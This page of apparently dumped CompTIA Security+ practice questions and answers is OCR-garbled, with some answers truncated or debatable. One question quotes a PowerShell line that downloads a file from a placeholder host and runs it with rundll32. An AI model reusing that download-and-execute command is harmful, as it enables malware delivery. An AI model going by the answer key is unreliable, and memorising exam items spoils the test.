security+10

100問 • 2年前

問題一覧

QUESTION 912 A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

The MRl vendor does not support newer versions of the OS.

QUESTION 913 A company received a "right to be forgotten" request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

GDPR

QUESTION 950 A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the flowing entries: 106.35. 45.53 - - [22/Miay/2020 :07:00:58 +0100) "GET /login?username= a calnápin=0000 HTTP/1 .1" 200 11705 "http:1www.example.com/login php" 106.35. 45.53 - (22/May/2020:07:01:21 +01001 "GET /1ogin?username-a cminápin=0001 HTTP/1. 1" 200 11705 "http:1/www.exaniple.com/login.php" 106.35.45.53-- (22/May/2020:07:01:52 +0100) GET /1ogin?usernamema dmin&pin-0002 HTTP/1.1" 200 11705 "ht tp://www.exanple,com/login.php" 106.35. 45.53-- [22/May/2020:07:02:18 +0100) "GET /login ?use rname=acmin&pin=0003 HTTP/1.14 200 11705 "http://www.example. com/login.php" 106.35.45,53-- [22/May/2020:07:02:18 +0100) "GET /login?use rname=a cmin&pin=0004 HTTP/1.1" 200 11705 "http:/ Iwww.example,com/login.php" Which of the following password attacks is taking place?

Brute-force

QUESTION 949 Which of the following control types is patch management classified under?

Corrective

QUESTION 914 A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

IPSec, SSL VPN

QUESTION 951 A company that provides an online streaming service made its customers' personal data.including names and email addresses, publicly available in a cloud storage service. As a result,the company experienced an increase in the number of requests to delete user accounts. Which of the following BEST describes the consequence of this data disclosure?

Reputation damage

A company is looking to migrate some servers to the cloud to minimize its technology footorint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the

SaaS

QUESTION 952 Which of the following can be used to detect a hacker who is stealing company data over port 80?

Packet capture

QUESTION 916 A network administrator needs to determine the sequence of a server farm's logs. Which of the following should the administrator consider? (Choose two.)

Time stamps, Time offset

QUESTION 917 A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to- know basis. Which of the following access control schemas should the administrator consider?

Mandatory

QUESTION 953 A company recently enhanced mobile device configuration by implementing a set of security controls biometrics context-aware authentication and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data. Which of the following additional controls should be put in place first?

Remote wipe

QUESTION 918 An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

Data controller

QUESTION 954 An organization wants to quickly assess how effectively the lT team hardened new laptops. Which of the following would be the best solution to perform this assessment?

Manually review the secure configuration guide checklists

QUESTION 919 Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

SIEM

QUESTION 955 A user is trying to upload a tax document which the corporate finance department requested but a security program is prohibiting the upload. A security analyst determines the file contains P. Which of the following steps can the analyst take to correct this issue?

Modify the exception list on the DLP to allow the upload

QUESTION 956 A cybersecurity analyst at Company A is working to establish a secure communication channel with a counterpart at Company B, which is 3,000 miles (4,828 kilometers) away. Which of the following concepts would help the analyst meet this goal in a secure manner?

Key exchange

QUESTION 920 Users report access to an application from an internal workstation is still unavailable to a specific server, even aftera recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

nmap

QUESTION 921 As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results: - The exception process and policy have been correctly followed by majority of users. - A sma ll number of users did not Create tickets for the requests but Were granted access. - All access had been approved by supervisors. - Valid requests for the access sporadically occurred across multiple departments -Access, in most cases, had not been removed when it was no longer needed Which of the following should the company do the ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the

QUESTION 957 A security analyst is reviewing computer logs because a host was compromised by malware. After the computer was infected it displayed an error screen and shut down. Which of the following should the analyst review first to determine more information?

System log

QUESTION 958 A security architect is working on an email solution that will send sensitive data. However, funds are not Currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

PGP

QUESTION 922 A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

a PUP

QUESTION 923 A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

Third-party applications are not being patched.

QUESTION 959 A user reset the password for a laptop but has been unable to log in to it since then. In addition, several unauthorized emails were sent on the user's behalf recently. The security team investigates the issue and identifies the following findings: - Firewall logs show excessive traffic from the laptop to an external site. -UnknoWn processes were running on the laptop. - RDP connections that appeared to be authorized were made to other network devices from the laptop. - High bandwidth utilization alerts from that user's username. Which of the following is most likely installed on the laptop?

Trojan

QUESTION 924 A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user's list of cron jobs: */10****root/writable/update.sh Which of the following actions should the penetration tester perform NEXT?

Privilege escalation

QUESTION 960 A systems administrator is required to entorce MFA for corporate email account access, relying on the possess ion factor. Which of the following authentication methods should the systems administrator choose? (Choose two.)

Time-based one-time password, Hardware token

QUESTION 925 An employee received an email with an unuSual file attachment named Updates.Ink. A security analyst is reverse engineering what the file does and finds that it executes the following script: C:\Windows\System32\WindowsPowerShellv1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dli; Start-Process rund|132.exe $env:TEMPlautoupdate.dl Which of the following BEST describes what the analyst found?

A PowerShell code is performing a DLL injection.

QUESTION 961 Which of the following biometric authentication methods is the most accurate?

Retina

QUESTION 926 Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

White team

QUESTION 962 A security team will be outsourcing several key functions to a third party and will require that: - Several of the functions will carry an audit burden - Attestations will be performed several times a year -Reports will be generated on a monthly basis Which of the following best describes the document that is used to define these requirements and stipulate how and when they are performed by the third party?

SLA

QUESTION 927 A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

MAC filtering

QUESTION 963 A small, local company experienced a ransomware attack. The company has one web-facing server and a few workstations. Everything is behind an ISP firewall. A single web-facing server is set up on the router to forward all polls so that the server is viewable from the internet. The company uses an older version of third-party software to manage the website. The assets were never patched. Which of the following should be done to prevent an attack like this from happening again?(Choose three)

Use the latest version of software, Implement a screened subnet for the web server, Install an endpoint security solution

QUESTION 964 A security investigation revealed that malicious software was installed on a server using a server administrator's credentials. During the investigation, the server administrator explained that Telnet was regularly used to log in. Which of the following most likely occurred?

A packet capture tool was used to steal the password

QUESTION 928 A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

Salting

QUESTION 965 Stakeholders at an organization must be kept aware of any incidents and receive updates on status changes as they occur. Which of the following plans would fulfill this requirement?

Communication plan

QUESTION 929 A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which of the following roles is the company assuming?

Data steward

QUESTION 930 An employee used a corporate mobile device during a vacation. Multiple contacts were modified in the device during the employee's vacation. Which of the following attack methods did an attacker use to insert the contacts without having physical access to the device?

Bluejacking

QUESTION 966 An employee who is using a mobile device for work, is required to use a fingerprint to unlock the device. VWhich of the following is this an example of?

Something you are

QUESTION 967 Which of the following security controls can be used to prevent multiple people from using a unique card swipe and being admitted to a secure entrance?

Access control vestibules

QUESTION 931 A security analyst is reviewing packet capture data from a compromised host on the network. In the packet capture, the analyst locates packets that contain large amounts of text. Which of the following is most likely installed on the compromised host?

Keylogger

QUESTION 968 Unauthorized devices have been detected on the internal network. The devices' locations were traced to Ethernet ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?

NAC

QUESTION 932 A security analyst reviews web server logs and notices the following line: Which of the following vulnerabilities is the attacker trying to exploit?

SQLİ

QUESTION 969 A Chief Information Security Officer (CISO) wants to implement a new solution that can protect against certain categories of websites whether the employee is in the office or away. Which of the following solutions should the CISO implement?

SWG

QUESTION 933 A user is having network connectivity issues when working from a coffee shop. The user has used the coffee shop as a workspace for several months without any issues. None of the other customers at the coffee shop are experiencing these issues. A help desk analyst at the user's company reviews the following Wi-Fi log:

A denial-of-service attack by disassociation is occurring.

QUESTION 934 Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?

biometric scanner

QUESTION 970 A security analyst is using OSINT to gather information to verify whether company data is available publicly. Which of the following is the best application for the analyst to use?

theHarvester

image

MAC flooding

QUESTION 935 A company is moving to new location. The systems administrator has provided the following server room requirements to the facilities staff: -Consistent power levels in case of brownouts or voltage spikes - A minimum of 30 minutes runtime followWing a power outage - Ability to trigger grace ful shutdowns of critical systems Which of the following would BEST meet the requirements?

Deploying an appropriately sized, network-connected UPS device

QUESTION 972 A security administrator needs to add fault tolerance and load balancing to the connection from the file server to the backup storage. Which of the following is the best choice to achieve this objective ?

Multipath

QUESTION 936 Which of the following would provide guidelines on how to label new network devices as part of the initial configuration?

Standard naming convention policy

QUESTION 937 A systems engineer thinks a business system has been compromised and is being used to exfiltrate data to a competitor. The engineer contacts the CSIRT. The CSIRT tells the engineer to immediately disconnect the network cable and to not do anything else. Which of the following is the most likely reason for this request?

The CSIRT thinks an insider threat is attacking the network.

QUESTION 973 Which of the following incident response phases should the proper collection of the detected loCs and estalblishment of a chain of custody be performed before?

ldentification

QUESTION 974 Which of the following measures the average time that equipment will operate beforeit breaks?

MTBF

QUESTION 938 Which of the following best describes the situation where a successfully onboarded employee who is using a fingerprint reader is denied access at the company's main gate?

False rejection

QUESTION 975 A security administrator examines the ARP table of an access switch and sees the fllowing output:

MAC flooding on fa0/2 port

QUESTION 939 Which of the following should customers who are involved with Ul developer agreements be concerned with when considering the use of these products on highly sensitive projects?

Outsourced code development

QUESTION 976 Which of the following documents specifies what to do in the event of catastrophic loss of a physical or virtual system?

Disaster recovery plan

QUESTION 940 A police department is using the cloud to share information with city officials. Which of the following cloud models describes this scenario?

Community

QUESTION 941 A user reports that a bank's website no longer displays a padlock symbol. A security analyst views the user's screen and notices the connection is using HTTP instead of HTTPS. Which of the following attacks is most likely occurring?

SSL stripping

QUESTION 977 Which of the following rales is responsible for defining the protection type and classification type for a given set of files?

Data owner

QUESTION 942 A data center has experienced an increase in under-voltage events following electrical grid maintenance outside the facility. These events are leading to occasional losses of system availability. Which of the following wOuld be the most cost-effective solution for the data center to implement?

Uninterruptible power supplies with battery backup

QUESTION 978 An employee's company email is configured with conditional access and reguires that MFA is enabled and used. An example of MFA is a phone call and:

an authentication application

QUESTION 943 A security architect is designing a remote access solution for a business partner. The business partner needs to access one Linux server at the company. The business partner wants to avoid managing a password for authentication and additional software installation. Which of the following should the architect recommend?

SSH key

QUESTION 979 Which of the following is a security implication of newer ICS devices that are becoming more common in corporations?

Devices with cellular communication capabiltes bypass traditional network security controls

QUESTION 944 A security analyst is assistinga team of developers with best practices for coding. The security analyst would like to defend against the use of SQL injection attacks. Which of the following should the security analyst recommend first?

Input validation

QUESTION 980 While troubleshooting service disruption on a mission-critical server, a technician discovered the user accOunt that was configured to run automated processes was disabled because the users password failed to meet password complexity requirements. Which of the following would be the best solution to securely prevent future issues?

Configuring a service account to run the processes

QUESTION 945 Cloud security engineers are planning to allow and deny access to specific features in order to increase data security. Which of the following cloud features is the most appropriate to ensure access is granted properly?

Resource policies

QUESTION 981 A security analyst is assessing a newly developed web application by testing SQL injection, CSRF, and XML injection. Which of the following frameworks should the analyst consider?

OWASP

A security operations technician is searching the log named /var/messages for any events that were associated with a workstation with the IP address 10.1.1.1. Which of the following would provide this information?

cat var/messages | grep 10.1.1.1

QUESTION 982 A user s laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user most likely experiencing?

Rogue access point

QUESTION 983 Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?

Lessons learned

image

User-agent spoofing

QUESTION 984 A security administrator is integrating several segments onto a single network. One of the segments, which includes legacy devices, presents a significant amount of risk to the network. Which of the following would allow users to access to the legacy devices without compromising the security of the entire network?

Jump server

QUESTION 948 Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?

Lessons learned

QUESTION 985 Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

Threat feeds

QUESTION 986 Which of the following types of disaster recovery plan exercises requires the least interruption to IT operations?

Tabletop

QUESTION 987 Which of the follow ng disaster recovery sites is the most cost effective to operate?

Cold site

QUESTION 988 A security operations center wants to implement a solution that can execute files to test for malicious activity. The solution should provide a report of the files' activity against known threats. Which of the following should the security operations center implement?

Cuckoo

QUESTION 989 A security administrator would like to ensure all cloud servers will have software preinstalled for facilitating vulnerability scanning and continuous monitoring. Which of the following concepts should the administrator utilize?

Provisioning

QUESTION 990 A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down. Which of the following should the architect implement on the server to achieve this goal?

Load balancing

QUESTION 991 A security administrator installed a new web server. The administrator did this to increase the capacity for an application due to resource exhaustion on another server. Which of the following alaorithms should the administrator use to split the number of the connections on each server in half?

Round-robin

QUESTION 992 Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?

Correlation dashboards

QUESTION 993 A security administrator performs weekly vuinerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities ?

Data processor

QUESTION 994 An attacker is targeting a company. The attacker notices that the company's employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees' devices will also become infected. Which of the following techniques is the attacker using?

Watering-hole attack

QUESTION 995 A diaital forensics team at a large company is investigating a case in which malicious code was downloaded over an HTTPS connection and was running in memory, but was never committed to disk. Which of the following techniques should the team use to obtain a sample of the malware binary?

Image volatile memory

QUESTION 996 A website visitor is required to provide properly formatted information in a specific field on a website form. Which of the following security measures is most likely used for this mandate?

Input validation

QUESTION 997 A technician is seting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

Ensuring that port 53 has been explicitly allowed in the rule set

QUESTION 998 A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

Sensitive

QUESTION 999 A small business uses kiosks on the sales floor to display product information for customers. A security team discovers the kiosks use end-of-life operating systems. Which of the following is the security team most likely to document as a security implication of the current architecture?

Patch availability

QUESTION 1000 During a security incident, the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9. A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

QUESTION 1001 Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?

Preparation

QUESTION 1002 An administrator is reviewing a single server's security logs and discovers the following:

Brute-force attack

QUESTION 1003 Which of the following can be used to identify potential attacker activities without affecing production servers?

Honeypot

QUESTION 1004 A company wants the ability to restrict web access and monitor the websites that emplovees visit. Which of the following would best meet these requirements?

Internet proxy

QUESTION 1005 A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is stll ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?

DD0S

QUESTION 1006 A company needs to centralize its logs to create a baseline and have visibility on its security events. Which of the following technologies will accomplish this objective?

Security information and event management

QUESTION 1007 Two organizations are discussing a possible merger. Both organizations' Chief Financial Officers wOuld like to safely share payroll data with each other to determine if the pay scales for different roles are similar at both organizations. Which of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

Data masking

QUESTION 1008 A large retail store's network was breached recently, and this news was made public. The store did not lose any intellectual property, and no customer information was stolen. Although no fines were incurred as a result, the store lost revenue after the breach. Which of the following is the most likely reason for this issue?

Reputation damage

QUESTION 1009 A government organization is developing an advanced Al defense system. Developers are using information collected from third-party providers. Analysts are noticing inconsistencies in the expected progress of the Al learning and attribute the outcome to a recent attack on one of the suppliers. Which of the following is the most likely reason for the inaccuracy of the system?

Tainted training data

QUESTION 1010 A company's help desk has received calls about the wireless network being down and users being unable to connect to it. The network administrator says all access points are up and running. One of the help desk technicians notices the affected users are working in a building near the parking lot. Which of the following is the most likely reason for the outage?

Someone near the building is jamming the signal.

100

QUESTION 1011 Which of the following can best protect against an employee inadvertently installing malware on a company system?

Least privilege

security+1

security+1

security+2

security+2

security+6

security+6

security+7

security+7

security+8

security+8

security+9

security+9

security+11

security+11

security+12

security+12

cysa+1

cysa+1

cysa+2

cysa+2

cysa+3

cysa+3

A+1

A+1

問題一覧

The MRl vendor does not support newer versions of the OS.

GDPR

Brute-force

QUESTION 949 Which of the following control types is patch management classified under?

Corrective

IPSec, SSL VPN

Reputation damage

SaaS

QUESTION 952 Which of the following can be used to detect a hacker who is stealing company data over port 80?

Packet capture

QUESTION 916 A network administrator needs to determine the sequence of a server farm's logs. Which of the following should the administrator consider? (Choose two.)

Time stamps, Time offset

Mandatory

Remote wipe

QUESTION 918 An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

Data controller

QUESTION 954 An organization wants to quickly assess how effectively the lT team hardened new laptops. Which of the following would be the best solution to perform this assessment?

Manually review the secure configuration guide checklists

SIEM

Modify the exception list on the DLP to allow the upload

Key exchange

nmap

Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the

System log

PGP

a PUP

Third-party applications are not being patched.

Trojan

Privilege escalation

Time-based one-time password, Hardware token

A PowerShell code is performing a DLL injection.

QUESTION 961 Which of the following biometric authentication methods is the most accurate?

Retina

QUESTION 926 Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

White team

SLA

QUESTION 927 A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

MAC filtering

Use the latest version of software, Implement a screened subnet for the web server, Install an endpoint security solution

A packet capture tool was used to steal the password

QUESTION 928 A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

Salting

QUESTION 965 Stakeholders at an organization must be kept aware of any incidents and receive updates on status changes as they occur. Which of the following plans would fulfill this requirement?

Communication plan

Data steward

Bluejacking

QUESTION 966 An employee who is using a mobile device for work, is required to use a fingerprint to unlock the device. VWhich of the following is this an example of?

Something you are

QUESTION 967 Which of the following security controls can be used to prevent multiple people from using a unique card swipe and being admitted to a secure entrance?

Access control vestibules

Keylogger

NAC

QUESTION 932 A security analyst reviews web server logs and notices the following line: Which of the following vulnerabilities is the attacker trying to exploit?

SQLİ

SWG

A denial-of-service attack by disassociation is occurring.

QUESTION 934 Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?

biometric scanner

QUESTION 970 A security analyst is using OSINT to gather information to verify whether company data is available publicly. Which of the following is the best application for the analyst to use?

theHarvester

image

MAC flooding

Deploying an appropriately sized, network-connected UPS device

Multipath

QUESTION 936 Which of the following would provide guidelines on how to label new network devices as part of the initial configuration?

Standard naming convention policy

The CSIRT thinks an insider threat is attacking the network.

QUESTION 973 Which of the following incident response phases should the proper collection of the detected loCs and estalblishment of a chain of custody be performed before?

ldentification

QUESTION 974 Which of the following measures the average time that equipment will operate beforeit breaks?

MTBF

QUESTION 938 Which of the following best describes the situation where a successfully onboarded employee who is using a fingerprint reader is denied access at the company's main gate?

False rejection

QUESTION 975 A security administrator examines the ARP table of an access switch and sees the fllowing output:

MAC flooding on fa0/2 port

QUESTION 939 Which of the following should customers who are involved with Ul developer agreements be concerned with when considering the use of these products on highly sensitive projects?

Outsourced code development

QUESTION 976 Which of the following documents specifies what to do in the event of catastrophic loss of a physical or virtual system?

Disaster recovery plan

QUESTION 940 A police department is using the cloud to share information with city officials. Which of the following cloud models describes this scenario?

Community

SSL stripping

QUESTION 977 Which of the following rales is responsible for defining the protection type and classification type for a given set of files?

Data owner

Uninterruptible power supplies with battery backup

QUESTION 978 An employee's company email is configured with conditional access and reguires that MFA is enabled and used. An example of MFA is a phone call and:

an authentication application

SSH key

QUESTION 979 Which of the following is a security implication of newer ICS devices that are becoming more common in corporations?

Devices with cellular communication capabiltes bypass traditional network security controls

Input validation

Configuring a service account to run the processes

Resource policies

QUESTION 981 A security analyst is assessing a newly developed web application by testing SQL injection, CSRF, and XML injection. Which of the following frameworks should the analyst consider?

OWASP

cat var/messages | grep 10.1.1.1

Rogue access point

QUESTION 983 Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?

Lessons learned

image

User-agent spoofing

Jump server

QUESTION 948 Which of the following processes would most likely help an organization that has conducted an incident response exercise to improve performance and identify challenges?

Lessons learned

QUESTION 985 Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

Threat feeds

QUESTION 986 Which of the following types of disaster recovery plan exercises requires the least interruption to IT operations?

Tabletop

QUESTION 987 Which of the follow ng disaster recovery sites is the most cost effective to operate?

Cold site

Cuckoo

Provisioning

Load balancing

Round-robin

QUESTION 992 Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?

Correlation dashboards

QUESTION 993 A security administrator performs weekly vuinerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities ?

Data processor

Watering-hole attack

Image volatile memory

Input validation

Ensuring that port 53 has been explicitly allowed in the rule set

Sensitive

Patch availability

access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

QUESTION 1001 Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?

Preparation

QUESTION 1002 An administrator is reviewing a single server's security logs and discovers the following:

Brute-force attack

QUESTION 1003 Which of the following can be used to identify potential attacker activities without affecing production servers?

Honeypot

QUESTION 1004 A company wants the ability to restrict web access and monitor the websites that emplovees visit. Which of the following would best meet these requirements?

Internet proxy

DD0S

QUESTION 1006 A company needs to centralize its logs to create a baseline and have visibility on its security events. Which of the following technologies will accomplish this objective?

Security information and event management

Data masking

Reputation damage

Tainted training data

Someone near the building is jamming the signal.

100

QUESTION 1011 Which of the following can best protect against an employee inadvertently installing malware on a company system?

Least privilege